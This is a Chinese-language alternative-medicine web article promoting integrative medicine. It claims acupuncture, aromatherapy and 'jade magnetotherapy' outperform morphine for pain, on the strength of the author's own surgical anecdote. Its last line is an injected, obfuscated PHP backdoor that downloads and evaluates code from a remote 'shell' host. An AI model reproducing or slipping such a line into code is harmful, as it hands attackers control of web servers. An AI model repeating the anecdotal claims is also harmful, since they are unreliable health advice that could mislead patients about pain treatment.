收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 以病患為中心才是好醫生
以病患為中心才是好醫生 列印 E-mail

        國家衛生研究院院內研究業務處張前處長曾表示:「中西醫整合,應該由同一個醫師來執行,才不至於在同時使用中西藥時,無法顧及藥物之間互補之功能及單方面藥物不足之處。只是國內同時瞭解、研究、使用中西藥物的醫師甚少,又,礙於法令,同一個醫師,不允許同時處方中西藥;造成同時使用中西醫藥物來治療患者的醫師太少,這是我國醫藥上極需改進的地方。」

可喜的是,台灣醫療界已漸漸覺醒。自二OO六年起,行政院衛生署開始致力為傳統醫學與現代醫學搭起溝通對話的橋樑,並舉辦中西醫整合相關議題之論壇,希望能推動中西醫學整合,並提出其合作的具體可行方案;混沌之際露出了一絲曙光,令人深切期盼。

        「整合醫學」是「整合所有對患者有利的醫療方式,同時用在同一個患者身上」,譬如目前主流醫學對於手術後及癌症末期疼痛的控制,是給予患者低劑量的嗎啡,一次自費定價約五千~八千台幣不等。然而嗎啡的副作用極大,且藥效褪去後的疼痛感會增加,又會影響手術後痊癒的效果;此時若能使用另類醫學中的針灸,或者是醫學芳療、磁療來減輕痛苦,是否遠比使用嗎啡要好?

        以我自己為例,由於車禍造成頸椎嚴重受傷,而實施頸椎椎間盤置換手術,置換頸椎三、四節,四、五節,五、六節共三節,須全身麻醉,手術時間長達八小時,從離開病房到回到病房共十四個小時。回病房後,立刻使用「玉石磁療」於外傷的穴道,另配合中醫經絡理論使用醫學芳療,兩個小時後便能排氣,三個小時後就拔除導尿管,十分鐘後雖仍有疼痛,但即可自行小便,這便是使用另類醫學來輔助主流醫學最好的例證。

        「整合醫學」的概念,無論何種醫療形式,都是「以病患為中心」的醫療模式!這不單是我的堅持,也是全球醫療界現行的主流價值與努力的方向。

 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));